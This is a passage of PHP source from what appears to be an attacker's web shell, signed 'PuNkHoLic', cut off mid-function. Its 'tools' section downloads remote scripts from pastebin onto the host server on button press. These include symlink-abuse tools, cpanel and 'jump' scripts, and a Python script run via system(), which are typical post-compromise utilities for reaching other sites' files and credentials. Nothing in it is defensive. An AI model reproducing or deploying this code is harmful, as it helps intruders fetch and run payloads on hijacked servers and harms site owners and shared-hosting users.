966 | unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
967 | echo 'Get out Now
968 |
969 | You are out now :D
www.facebook.com/PuNkHoLic';
970 | }
971 | ///my editing start here for tools
972 | function download_remote_file($file_url, $save_to)
973 | {
974 | $content = file_get_contents($file_url);
975 | file_put_contents($save_to, $content);
976 | }
977 | if (isset($_POST['cp'])) {
978 | download_remote_file('http://pastebin.com/raw/2Ntdj7ju', realpath("./") . '/cp.php');
979 | header("location:cp.php");
980 | }
981 | if (isset($_POST['SymlinkbySmevk'])) {
982 | download_remote_file('http://pastebin.com/raw.php?i=PhSk7Kvq', realpath("./") . '/SymlinkbySmevk.php');
983 | header("location:SymlinkbySmevk.php");
984 | }
985 | if (isset($_POST['SymlinkbyCheetah'])) {
986 | download_remote_file('http://pastebin.com/raw.php?i=EXejgAMv', realpath("./") . '/SymlinkbyCheetah.php');
987 | header("location:SymlinkbyCheetah.php");
988 | }
989 | if (isset($_POST['SymlinkbyTorjan'])) {
990 | download_remote_file('http://pastebin.com/raw.php?i=YUg4pXe2', realpath("./") . '/sym.py');
991 | $url = 'http://' . $_SERVER['SERVER_NAME'] . dirname($_SERVER['SCRIPT_NAME']) . '/trjnx/';
992 | header('location: '.$url);
993 | system('python sym.py');
994 | }
995 | if (isset($_POST['jump'])) {
996 | download_remote_file('http://pastebin.com/raw/MxtcT6nX', realpath("./") . '/jump.php');
997 | header("location:jump.php");
998 | }
999 | if (isset($_POST['adminer'])) {
1000 | system('wget https://www.adminer.org/static/download/4.2.5/adminer-4.2.5-mysql-en.php adminer.php');
1001 | header("location:adminer-4.2.5-mysql-en.php");
1002 | }
1003 | if (isset($_POST['cg'])) {
1004 | download_remote_file('http://pastebin.com/raw/WSgkDHSN', realpath("./") . '/cg.php');
1005 | header("location:cg.php");
1006 | }
1007 | function actionImportScripts() {
1008 | printHeader();
1009 | echo '